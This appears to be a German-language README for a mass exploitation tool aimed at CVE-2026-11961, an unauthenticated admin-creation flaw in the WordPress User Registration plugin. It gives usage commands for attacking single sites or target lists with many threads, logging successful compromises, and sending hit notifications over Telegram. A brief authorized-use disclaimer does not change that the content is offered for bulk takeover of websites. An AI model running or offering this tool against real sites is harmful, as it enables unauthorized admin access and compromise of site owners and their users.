
CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Privilege Escalation. Fehlkonfigurierte Mitgliedschaftsrollen → Nicht authentifizierte Admin-Erstellung → Kompromittierung der Website. CVSS 8.1
Massen-Exploit-Tool für CVE-2026-11961, das das WordPress-Plugin User Registration & Membership betrifft.
--force)# Show help
python3 mass.py -h
# Single target
python3 mass.py -u https://target.com
# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"
# Multiple targets
python3 mass.py -l targets.txt -t 20
# Save successful results
python3 mass.py -l targets.txt -o results.jsonl
# Write log file
python3 mass.py -l targets.txt --log exploit.log
# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID
# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080
# Force mode
python3 mass.py -u https://target.com --force
Dieses Projekt wird ausschließlich für autorisierte Sicherheitsbewertungen, defensive Sicherheitsforschung und Schwachstellenvalidierung bereitgestellt.
Durch die Nutzung dieser Software bestätigst du, dass du ausdrücklich autorisiert bist, die Zielsysteme zu bewerten. Unbefugter Zugriff auf Computersysteme ist verboten und kann gegen geltende Gesetze verstoßen.
Der Autor und die Mitwirkenden ermutigen oder befürworten keine unbefugte Nutzung dieses Projekts und übernehmen keinerlei Verantwortung oder Haftung für Missbrauch, Schäden oder rechtliche Konsequenzen, die sich aus der Nutzung ergeben.
JohenLastGen JLG NETWORK
| Option | Beschreibung |
|---|
-h, --help | Hilfemeldung anzeigen und beenden |
-u, --url | Einzelne Ziel-URL |
-l, --list | Datei mit Ziel-URLs (eine pro Zeile) |
--username | Administrator-Benutzername (Standard: zufällig generiert) |
--password | Administrator-Passwort (Standard: zufällig generiert) |
-t, --threads | Anzahl gleichzeitiger Threads (Standard: 5) |
--timeout | Request-Timeout in Sekunden (Standard: 15) |
-o, --output | Erfolgreiche Ergebnisse in einer JSONL-Datei speichern |
--log | Konsolenprotokolle in einer Datei speichern |
--proxy | HTTP/HTTPS-Proxy (z. B. http://127.0.0.1:8080) |
--force | Versionsprüfung überspringen und Verarbeitung fortsetzen |
--tg-token | Telegram-Bot-Token |
--tg-chat | Telegram-Chat-ID |